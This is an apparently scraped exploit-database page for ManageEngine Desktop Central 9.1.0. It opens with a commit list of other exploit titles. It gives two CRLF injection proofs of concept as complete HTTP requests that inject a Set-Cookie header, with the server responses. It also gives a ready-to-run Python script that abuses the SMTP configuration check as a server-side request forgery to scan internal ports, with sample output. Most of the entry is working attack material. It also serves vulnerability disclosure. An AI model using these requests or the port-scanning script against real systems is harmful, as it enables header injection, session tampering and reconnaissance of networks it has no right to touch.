b137003172
36 changes to exploits/shellcodes/ghdb MiniDVBLinux 5.4 - Change Root Password MiniDVBLinux 5.4 - Remote Root Command Injection MiniDVBLinux 5.4 - Arbitrary File Read MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) MiniDVBLinux <=5.4 - Config Download Exploit Desktop Central 9.1.0 - Multiple Vulnerabilities FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass Aero CMS v0.0.1 - PHP Code Injection (auth) Aero CMS v0.0.1 - SQL Injection (no auth) Atom CMS v2.0 - SQL Injection (no auth) Canteen-Management v1.0 - SQL Injection Canteen-Management v1.0 - XSS-Reflected Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS) Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE) WebTareas 2.4 - RCE (Authorized) WebTareas 2.4 - Reflected XSS (Unauthorised) WebTareas 2.4 - SQL Injection (Unauthorised) WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass Grafana <=6.2.4 - HTML Injection Hex Workshop v6.7 - Buffer overflow DoS Scdbg 1.0 - Buffer overflow DoS Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) AVS Audio Converter 10.3 - Stack Overflow (SEH) Explorer32++ v1.3.5.531 - Buffer overflow Frhed (Free hex editor) v1.6.0 - Buffer overflow Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path Resource Hacker v3.6.0.92 - Buffer overflow Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
234 lines
No EOL
8.3 KiB
Text
234 lines
No EOL
8.3 KiB
Text
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
|
|
# Discovery by: Rafael Pedrero
|
|
# Discovery Date: 2021-02-14
|
|
# Software Link : http://www.desktopcentral.com
|
|
# Tested Version: 9.1.0 (Build No: 91084)
|
|
# Tested on: Windows 10
|
|
|
|
# Vulnerability Type: CRLF injection (CRLF) - 1
|
|
|
|
CVSS v3: 6.1
|
|
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
CWE: CWE-93
|
|
|
|
Vulnerability description: CRLF injection vulnerability in ManageEngine
|
|
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
|
|
headers and conduct HTTP response splitting attacks via the fileName
|
|
parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.
|
|
|
|
Proof of concept:
|
|
|
|
GET
|
|
https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
|
|
HTTP/1.1
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
|
|
Firefox/85.0
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
|
DNT: 1
|
|
Connection: keep-alive
|
|
Referer:
|
|
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
|
|
Upgrade-Insecure-Requests: 1
|
|
Content-Length: 0
|
|
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
|
|
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
|
|
showRefMsg=false; summarypage=false;
|
|
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
|
|
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
|
|
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
|
|
Host: localhost
|
|
|
|
Response:
|
|
HTTP/1.1 200 OK
|
|
Date:
|
|
Server: Apache
|
|
Pragma: public
|
|
Cache-Control: max-age=0
|
|
Expires: Wed, 31 Dec 1969 16:00:00 PST
|
|
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
|
|
Secure
|
|
Set-Cookie: buildNum=91084; Path=/
|
|
Set-Cookie: showRefMsg=false; Path=/
|
|
Set-Cookie: summarypage=false; Path=/
|
|
Set-Cookie: dc_customerid=1; Path=/
|
|
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
|
|
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
|
|
Set-Cookie: screenResolution=1280x1024; Path=/
|
|
Content-Disposition: attachment; filename=any
|
|
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
|
|
X-dc-header: yes
|
|
Content-Length: 95
|
|
Keep-Alive: timeout=5, max=20
|
|
Connection: Keep-Alive
|
|
Content-Type: text/csv;charset=UTF-8
|
|
|
|
|
|
# Vulnerability Type: CRLF injection (CRLF) - 2
|
|
|
|
CVSS v3: 6.1
|
|
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
CWE: CWE-93
|
|
|
|
Vulnerability description: CRLF injection vulnerability in ManageEngine
|
|
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
|
|
headers and conduct HTTP response splitting attacks via the fileName
|
|
parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.
|
|
|
|
Proof of concept:
|
|
|
|
GET
|
|
https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
|
|
HTTP/1.1
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
|
|
Firefox/85.0
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
|
DNT: 1
|
|
Connection: keep-alive
|
|
Referer:
|
|
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
|
|
Upgrade-Insecure-Requests: 1
|
|
Content-Length: 0
|
|
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
|
|
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
|
|
showRefMsg=false; summarypage=false;
|
|
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
|
|
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
|
|
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
|
|
Host: localhost
|
|
|
|
|
|
HTTP/1.1 200 OK
|
|
Date:
|
|
Server: Apache
|
|
Pragma: public
|
|
Cache-Control: max-age=0
|
|
Expires: Wed, 31 Dec 1969 16:00:00 PST
|
|
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
|
|
Secure
|
|
Set-Cookie: buildNum=91084; Path=/
|
|
Set-Cookie: showRefMsg=false; Path=/
|
|
Set-Cookie: summarypage=false; Path=/
|
|
Set-Cookie: dc_customerid=1; Path=/
|
|
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
|
|
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
|
|
Set-Cookie: screenResolution=1280x1024; Path=/
|
|
Content-Disposition: attachment; filename=any
|
|
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
|
|
X-dc-header: yes
|
|
Content-Length: 4470
|
|
Keep-Alive: timeout=5, max=100
|
|
Connection: Keep-Alive
|
|
Content-Type: application/pdf;charset=UTF-8
|
|
|
|
|
|
|
|
# Vulnerability Type: Server-Side Request Forgery (SSRF)
|
|
|
|
CVSS v3: 8.0
|
|
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
CWE: CWE-918 Server-Side Request Forgery (SSRF)
|
|
|
|
Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability
|
|
in ManageEngine Desktop Central 9.1.0 allows an attacker can force a
|
|
vulnerable server to trigger malicious requests to third-party servers or
|
|
to internal resources. This vulnerability allows authenticated attacker
|
|
with network access via HTTP and can then be leveraged to launch specific
|
|
attacks such as a cross-site port attack, service enumeration, and various
|
|
other attacks.
|
|
|
|
Proof of concept:
|
|
|
|
Save this content in a python file (ex. ssrf_manageenginedesktop9.py),
|
|
change the variable sitevuln value with ip address:
|
|
|
|
import argparse
|
|
from termcolor import colored
|
|
import requests
|
|
import urllib3
|
|
import datetime
|
|
urllib3.disable_warnings()
|
|
|
|
print(colored('''
|
|
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
|
|
''',"red"))
|
|
|
|
def smtpConfig_ssrf(target,port,d):
|
|
now1 = datetime.datetime.now()
|
|
text = ''
|
|
sitevuln = 'localhost'
|
|
url = 'https://
|
|
'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%
|
|
40manageengine.com
|
|
&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%
|
|
40manageengine.com'
|
|
cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;
|
|
buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;
|
|
JSESSIONID=D10A9C62D985A0966647099E14C622F8;
|
|
DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
|
|
try:
|
|
response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0
|
|
(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':
|
|
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':
|
|
'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': '
|
|
https://192.168.56.250:8383/smtpConfig.do','Cookie':
|
|
cookie,'Connection': 'keep-alive'},verify=False, timeout=10)
|
|
|
|
text = response.text
|
|
now2 = datetime.datetime.now()
|
|
rest = (now2 - now1)
|
|
seconds = rest.total_seconds()
|
|
|
|
if ('updateRefMsgCookie' in text):
|
|
return colored('Cookie lost',"yellow")
|
|
|
|
if d == "0":
|
|
print ('Time response: ' + str(rest) + '\n' + text + '\n')
|
|
|
|
if (seconds > 5.0):
|
|
return colored('open',"green")
|
|
else:
|
|
return colored('closed',"red")
|
|
|
|
except:
|
|
now2 = datetime.datetime.now()
|
|
rest = (now2 - now1)
|
|
seconds = rest.total_seconds()
|
|
if (seconds > 10.0):
|
|
return colored('open',"green")
|
|
else:
|
|
return colored('closed',"red")
|
|
|
|
return colored('unknown',"yellow")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -
|
|
SSRF Open ports",required=True)
|
|
parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9
|
|
- SSRF Open ports",required=True)
|
|
parser.add_argument('-d','--debug', help="ManageEngine Desktop Central
|
|
9 - SSRF Open ports (0 print or 1 no print)",required=False)
|
|
args = parser.parse_args()
|
|
timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
|
|
print (args.ip + ':' + args.port + ' ' + timeresp + '\n')
|
|
|
|
|
|
|
|
And:
|
|
|
|
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080
|
|
|
|
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
|
|
|
|
192.168.56.250:8080 open
|
|
|
|
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777
|
|
|
|
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
|
|
|
|
192.168.56.250:7777 closed |